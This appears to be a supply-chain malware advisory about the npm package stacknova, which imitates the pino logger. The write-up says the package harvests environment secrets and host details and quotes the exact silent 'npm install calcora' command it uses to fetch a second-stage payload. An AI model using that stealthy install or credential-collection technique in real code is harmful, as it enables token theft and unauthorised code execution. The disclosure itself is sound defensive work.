stacknova@1.0.0
Malicious code in stacknova (npm)
Analysis
stacknova@1.0.0 combosquats the pino logger library. When imported, package/lib/writer.js automatically executes: it reads all environment variables (including NPM_TOKEN, GITHUB_TOKEN, AWS credentials, etc.), collects the hostname, OS platform, username, and MAC addresses into a reconnaissance object; then silently installs the calcora package via `npm install calcora --no-warnings --no-save --no-progress --loglevel silent` and loads its pino.js file as a second-stage payload. The package bundles pino documentation as camouflage. The silent second-stage install enables arbitrary code execution on the victim's machine without consent.
- analyzed by
- Leitwacht
- first seen
- Jun 14, 2026, 06:03 AM
- analyzed
- Jun 14, 2026, 06:06 AM
Related advisories
- sqrt-bn-enhanced@2.0.9
- sort-btree@2.1.4
- solana-token-api@1.0.0
- sjs-builder@1.0.5
- codyx-ai-windows-x64-baseline@1.14.42
- codyx-ai-windows-x64@1.14.42
- codyx-ai-darwin-x64-baseline@1.14.42
- seed-to-private@1.0.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.